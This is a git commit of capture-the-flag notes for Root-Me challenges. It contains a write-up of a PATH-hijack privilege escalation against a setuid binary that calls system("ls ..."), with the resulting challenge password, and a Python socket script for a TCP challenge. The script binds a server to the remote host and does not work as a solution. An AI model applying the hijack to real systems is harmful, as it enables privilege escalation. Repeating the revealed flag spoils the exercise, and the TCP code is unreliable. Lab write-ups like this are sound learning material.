init

Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>

app/bash-system-1/notes.org

@@ -0,0 +1,91 @@
+* Bash - System 1
+
+Challenge: https://www.root-me.org/de/Herausforderungen/App-Script/ELF32-System-1
+
+Aufgabe
+Quellcode:
+#+begin_src C
+    #include <stdlib.h>
+    #include <sys/types.h>
+    #include <unistd.h>
+
+    int main(void)
+    {
+        setreuid(geteuid(), geteuid());
+        system("ls /challenge/app-script/ch11/.passwd");
+        return 0;
+    }
+#+end_src
+
+Télécharger
+Zugangsdaten für die Übung:
+#+begin_quote
+Host	challenge02.root-me.org
+Protokoll	SSH
+Port	2222
+Zugang per SSH 	ssh -p 2222 app-script-ch11@challenge02.root-me.org
+Benutzername	app-script-ch11
+Passwort	app-script-ch11
+#+end_quote
+
+---
+
+On the system is a ch11 binary which is the compiled version of the above program
+Opening the compiled program in r2 we can see
+
+#+begin_src asm
+$ r2 r ./ch11
+[0x0000058d]> aaaa
+[0x0000058d]> afl
+[0x0000058d]> s main
+[0x0000058d]> pdf
+/ 89: int main (char **argv);
+|           ; var int32_t var_ch @ ebp-0xc
+|           ; arg char **argv @ esp+0x34
+|           0x0000058d      8d4c2404       lea ecx, [argv]
+|           0x00000591      83e4f0         and esp, 0xfffffff0
+|           0x00000594      ff71fc         push dword [ecx - 4]
+|           0x00000597      55             push ebp
+|           0x00000598      89e5           mov ebp, esp
+|           0x0000059a      56             push esi
+|           0x0000059b      53             push ebx
+|           0x0000059c      51             push ecx
+|           0x0000059d      83ec0c         sub esp, 0xc
+|           0x000005a0      e8ebfeffff     call sym.__x86.get_pc_thunk.bx
+|           0x000005a5      81c32b1a0000   add ebx, 0x1a2b
+|           0x000005ab      e850feffff     call sym.imp.geteuid        ; uid_t geteuid(void)
+|           0x000005b0      89c6           mov esi, eax
+|           0x000005b2      e849feffff     call sym.imp.geteuid        ; uid_t geteuid(void)
+|           0x000005b7      83ec08         sub esp, 8
+|           0x000005ba      56             push esi
+|           0x000005bb      50             push eax
+|           0x000005bc      e85ffeffff     call sym.imp.setreuid
+|           0x000005c1      83c410         add esp, 0x10
+|           0x000005c4      83ec0c         sub esp, 0xc
+|           0x000005c7      8d83a0e6ffff   lea eax, [ebx - 0x1960]
+|           0x000005cd      50             push eax                    ; const char *string
+|           0x000005ce      e83dfeffff     call sym.imp.system         ; int system(const char *string)
+|           0x000005d3      83c410         add esp, 0x10
+|           0x000005d6      b800000000     mov eax, 0
+|           0x000005db      8d65f4         lea esp, [var_ch]
+|           0x000005de      59             pop ecx
+|           0x000005df      5b             pop ebx
+|           0x000005e0      5e             pop esi
+|           0x000005e1      5d             pop ebp
+|           0x000005e2      8d61fc         lea esp, [ecx - 4]
+\           0x000005e5      c3             ret
+#+end_src
+
+---
+
+
+#+begin_src sh
+app-script-ch11@challenge02:~$ cp /bin/cat /tmp/ls
+app-script-ch11@challenge02:~$ ll /tmp/
+ls: cannot open directory '/tmp/': Permission denied
+app-script-ch11@challenge02:~$ ls -lah /tmp/
+ls: cannot open directory '/tmp/': Permission denied
+app-script-ch11@challenge02:~$ PATH="/tmp/"
+app-script-ch11@challenge02:~$ ./ch11
+!oPe96a/.s8d5
+#+end_src

programming/tcp-back-to-school/main.py

@@ -0,0 +1,28 @@
+import socket
+from threading import Thread
+
+
+serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+host = "challenge01.root-me.org"
+port = 52002
+serversocket.bind((host, port))
+
+
+class client(Thread):
+    def __init__(self, socket, address):
+        Thread.__init__(self)
+        self.sock = socket
+        self.addr = address
+        self.start()
+
+    def run(self):
+        while 1:
+            print("Client sent:", self.sock.recv(1024).decode())
+            self.sock.send(b"Oi you sent something to me")
+
+
+serversocket.listen(5)
+print("server started and listening")
+while 1:
+    clientsocket, address = serversocket.accept()
+    client(clientsocket, address)

programming/tcp-back-to-school/notes.org

@@ -0,0 +1,55 @@
+* TCP - BAck to School
+
+Challenge: https://www.root-me.org/de/Herausforderungen/Programmierung/TCP-Back-to-school
+
+Aufgabe
+
+Um diesen Test mit dem TCP-Protokoll zu starten, müssen Sie eine Verbindung zu einem Programm an einem Netzwerk-Socket herstellen.
+
+- Berechne die Quadratwurzel aus Nummer 1 und multipliziere sie mit Nummer 2.
+- Runden Sie dann das Ergebnis auf zwei Dezimalstellen ab.
+- Sie haben 2 Sekunden Zeit, um die richtige Antwort zu senden, sobald das Programm Ihnen die Berechnung sendet.
+
+Zugangsdaten für die Übung
+
+Host	challenge01.root-me.org
+Protokoll	TCP
+Port	52002
+
+---------
+
+#+begin_src sh :results output
+cat ./main.py
+#+end_src
+
+#+RESULTS:
+#+begin_example
+import socket
+from threading import Thread
+
+
+serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+host = "challenge01.root-me.org"
+port = 52002
+serversocket.bind((host, port))
+
+
+class client(Thread):
+    def __init__(self, socket, address):
+        Thread.__init__(self)
+        self.sock = socket
+        self.addr = address
+        self.start()
+
+    def run(self):
+        while 1:
+            print("Client sent:", self.sock.recv(1024).decode())
+            self.sock.send(b"Oi you sent something to me")
+
+
+serversocket.listen(5)
+print("server started and listening")
+while 1:
+    clientsocket, address = serversocket.accept()
+    client(clientsocket, address)
+#+end_example